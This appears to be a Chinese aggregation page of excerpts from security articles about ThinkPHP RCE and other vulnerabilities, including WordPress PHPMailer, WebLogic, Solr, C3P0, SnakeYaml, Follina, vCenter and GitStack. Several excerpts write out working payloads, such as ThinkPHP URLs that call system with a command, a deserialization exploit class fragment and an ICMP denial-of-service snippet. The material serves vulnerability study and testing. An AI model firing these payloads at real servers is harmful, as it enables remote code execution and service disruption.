THINKPHP-RCE-POC】的更多相关文章

TP5新RCE漏洞 昨天又是周五,讨厌周五曝漏洞,还得又得加班,算了,还是先验证一波.新的TP5RCE,据说发现者因为上次的RCE,于是又审计了代码,结果发现的.TP5也成了万人轮啊. 测试 环境搭建 windows下phpstudy,然后下载tp5.0.23到相应的www目录下 linux,安装启动apache和php,下载tp5.0.23到相应www目录下 mac(本机) 启动apache, 下载tp5.0.23到/library/Webserver/Documents下 环境测试 漏洞验证…
[2017.5.4更新] 昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295.从描述来看,前者是WordPress Core 4.6一个未经授权的RCE漏洞.不过实际上,这就是去年12月份FreeBuf已经报道的漏洞,因此我们在原文基础上进行更新. 这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现.未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落.无需插件或…
漏洞环境 https://www.vulnhub.com/ https://github.com/vulhub/vulhub https://github.com/QAX-A-Team/WeblogicEnvironment 启用.关闭命令 # 启用环境 docker-compose up -d 环境关闭 docker-compose down 查看 WEB 应用容器 root@kali:/opt/vulhub/zabbix/CVE-2016-10134# docker ps CONTAINER…
环境: Thinkphp 5.0.15 PHP version:7.0.12 WAF: D盾 ,安全狗 Thinkphp 采用 MVC 模式  核心:模块 -> 控制器 –> 方法 思路:利用已经有的think 类包库 去做一些事情 利用已有的功能,顺便对D盾 绕过 方法: Payload1: http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[…
CMS识别 云悉 http://whatweb.bugscaner.com/batch.html CakePHP  CakePHP <= / Cache Corruption Exploit 2011-01 vBulletin CVE-- vBulletin .x 0day pre-auth RCE #POC #!/usr/bin/python # # vBulletin .x 0day pre-auth RCE exploit # # This should work on all versi…
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Insufficient output sanitizing when generating configuration file phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL phpMyAdmin的Setup脚本用于生成配置.如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php 配置文件中包含任意PHP代码.由…
漏洞信息 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站.也可以把 WordPress 当作一个内容管理系统(CMS)来使用.WordPress 使用 PHPMailer 组件向用户发送邮件.PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害. 漏洞编号 CVE-2016-10033 影响版本 WordPress…
访问控制类漏洞与隐患 这一类漏洞与隐患属于访问控制与身份鉴别问题,一般有没有配置访问控制.访问控制弱(弱口令或者空口令),身份鉴别可以绕过等问题 漏洞协议组件 漏洞类型 漏洞评级 SSH 弱口令 严重 RDP 未授权.弱口令 严重 SMB 未授权(共享直接访问,不验证).弱口令 严重 FTP 匿名.弱口令 严重 Telnet 未授权.弱口令 严重 MySQL 未授权.弱口令 严重 PostgreSQL 弱口令 严重 MongoDB 未授权(不验证直接登录,可以增删改查).弱口令 严重 Redis…
笔者<Qftm>原文发布<合天>:https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652852661&idx=1&sn=1dd018a6694b79e18087e31ac44d44fa&chksm=bd592d788a2ea46eae02350200b61e29bb944c5c444bd5c1282d58a3d43557104deb31c1d214&mpshare=1&sc…
Solr简单介绍 Solr是建立在Apache Lucene ™之上的一个流行.快速.开放源代码的企业搜索平台. Solr具有高度的可靠性,可伸缩性和容错能力,可提供分布式索引,复制和负载平衡查询,自动故障转移和恢复,集中式配置等.Solr为许多世界上最大的互联网站点提供搜索和导航功能. 漏洞介绍 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改. Apache Solr默认集成VelocityR…
一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com    #本地管理员用户 sun\Administrator dc123.com    #域管用户,改为了panda123..   Win2008: sun\admin 2020.com    #由于需要改密码,我更改为panda666...   ②虚拟机网卡设置 Win7双网卡模拟内外网: 外网:桥接模式与物理机相通 内网:根据公开截图是:192.168.138.136,仅主机模式 利用管理员账号…
Java安全之C3P0利用与分析 目录 Java安全之C3P0利用与分析 写在前面 C3P0 Gadget http base C3P0.getObject() 序列化 反序列化 Class.forName() JNDI 利用姿势 调试分析 Hex序列化字节加载器 利用姿势 调试分析 Reference 写在前面 很久以前就听nice0e3师傅说打Fastjson可以试试C3P0,当时还不会java(虽然现在也没会多少)也就没有深究.最近调试Fastjson的漏洞,又想到了这个点,就拿出来学习下…
Java安全之SnakeYaml反序列化分析 目录 Java安全之SnakeYaml反序列化分析 写在前面 SnakeYaml简介 SnakeYaml序列化与反序列化 常用方法 序列化 反序列化 SnakeYaml反序列化漏洞 影响版本 漏洞原理 漏洞复现 调试分析 小结 SPI机制 ScriptEngineManager分析 其他利用姿势 C3P0 ScriptEngineManager Reference 写在前面 学习记录 SnakeYaml简介 snakeyaml包主要用来解析yaml格…
1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现,10月份的漏洞是由于官方修复不完善导致被绕过. 嗯,又学习了很多知识. 2.批量测试脚本 # -*- coding: UTF-8 -*- import requests,sys,os help = ''' eg:CVE-2017-10271.py "ping \`whoami\`.dnslog.cv…
#!/usr/bin/env python # coding:utf-8 # @Date : 2017/12/22 17:11 # @File : weblogic_poc.py # @Author : sevck # @Link : http://www.qingteng.cn #------------------------------------------------------------------------- import requests import re from sys…
thinkphp5.1.1为例 1.代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2.命令执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=system&data=dir 各个版本的执行方式各不相同, 未测试的一些POC:…
前言 上个学期钻研web渗透的时候接触过几个tp的框架,但那时候还没有写blog的习惯,也没有记录下来,昨天在做ctf的时候正好碰到了一个tp的框架,想起来就复现一下 正文 进入网站,标准笑脸,老tp人了 直接先一发命令打出phpinfo(),因为是在打ctf有些地方我就没有仔细去看 index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]…
昨天看了下'Follina' MS-MSDT n-day Microsoft Office RCE 这个漏洞,修改了下chvancooten的脚本,实现可以自定义word模板,便于实战中钓鱼使用,自己编辑好钓鱼word文档后-f参数指定即可. 也可以从我的github上下载:https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed 1.复现 使用https://github.com/chvancooten/follin…
文章来源:lsh4ck's Blog 原文链接: https://www.77169.com/html/237165.html Thinkphp 5.0.22   http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password http:…
直接上exp吧,Windows下. <?php namespace think\process\pipes; class Windows { private $files = []; public function __construct() { $this->files = [new \think\model\Merge]; } } namespace think\model; use think\Model; class Merge extends Model { protected $a…
漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi.vCenter Server 等一系列的软件.其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机. vSphere Client(HTML5) 在 vCenter Server 插件中存在一个远程执行代码漏洞.未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,控制服…
# CVE-2018-4407 ICMP DOS # https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 # from https://twitter.com/ihackbanme import sys try: from scapy.all import * except Exception as e: print ("[*] You need install scapy first:\n[*] sudo pip install s…
 5.0.0<=ThinkPHP5<=5.0.10 .   漏洞利用条件: 1.基于tp5开发的代码中使用了Cache::set 进行缓存 2.在利用版本范围内 3.runtime目录可以访问   扩展: 1.不可访问,可以考虑包含.前提要找到包含处.//Tp有一个Cache一个包含 2.利用缓存,做一个长期的shell动态生成.   漏洞原因:缓存名,可以预测,缓存内容用户可控.   造成漏洞代码 <?php namespace app\index\controller; use th…
https://github.com/pochubs/pochubs/blob/master/ThinkPHP.md tp 历史漏洞 路由控制類RCE/think/App.php if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); } 變量覆蓋RCE/think/Request.php if (in…
出品|MS08067实验室(www.ms08067.com) 本文作者:dch(Ms08067实验室 SRSP TEAM小组成员) 一.利用Metasploit进行攻击的流程图   Metasploit渗透流程 二.Metasploit渗透攻击 (1)通过msfconsole命令启动Metasploit在这个过程中,系统会主动加载数据库,如图2所示:   启动Metasploit (2)使用辅助模块进行端口扫描,如下图所示:   进行扫描 (3)寻找合适的漏洞利用模块并使用,如下图所示:   加…
catalogue . Java xStream . DynamicProxyConverter . java.beans.EventHandler . RCE via XStream object deserialization . Standard way to serialize and deserialize Objects with XStream . SECURITY- / CVE-- . What to do about it 0. 利用方式跟踪 目前为止,已知有两个触发方式 xs…
catalog . Introduction . nginx文件类型错误解析漏洞 . 针对直接公网开放的Fast-CGI攻击 . 通过FCGI API动态修改php.ini中的配置实现RCE 1. Introduction 我们首先来梳理一下CGI的相关概念 . CGI CGI是为了保证web server传递过来的数据是标准格式的,从本质上来说,它是一个协议标准.web server(例如nginx)只是内容的分发者.比如 ) 如果请求/index.html,那么web server会去文件系…
我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行. 事情是这样的.当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传头像的文件上传表单.开始时我并没指望在上传功能处发现漏洞,但我决定试试. 我上传了一个图片文件,通过截断http数据包,修改jpg图片的文件名后缀为php,然后继续上传.我惊讶的居然上传成功了,我几乎不敢相信这么简单的漏洞居然存在.于是我复制了图片url并且在浏览器上打开.进入我眼帘的是图片的二进制…
漏洞简介 漏洞简情 漏洞程序 GitStack 影响版本 <=2.3.10 漏洞类型 RCE 漏洞评价 高危 漏洞编号 CVE-2018-5955 漏洞程序介绍 GitStack是一款基于Python(Django框架)和PHP的win平台下的git可视化平台.它存在很多问题,下面简单介绍一下所有的背景安全问题.这些背景安全问题将导致RCE漏洞的利用. 背景安全问题 默认弱口令admin/admin,以及口令提示  debug模式开启,泄露敏感信息 https://a.b.c.d/rest/se…
本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞.简而言之, 通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞,允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令. 现在,当这个漏洞以病毒式疯狂传播时,主要的应用防火墙厂商开始更新它们的规则引擎和检测技术,以防止它发生. 但是作者不仅能够绕过防火墙并获得远程代码执行,还能够通过利用内核漏…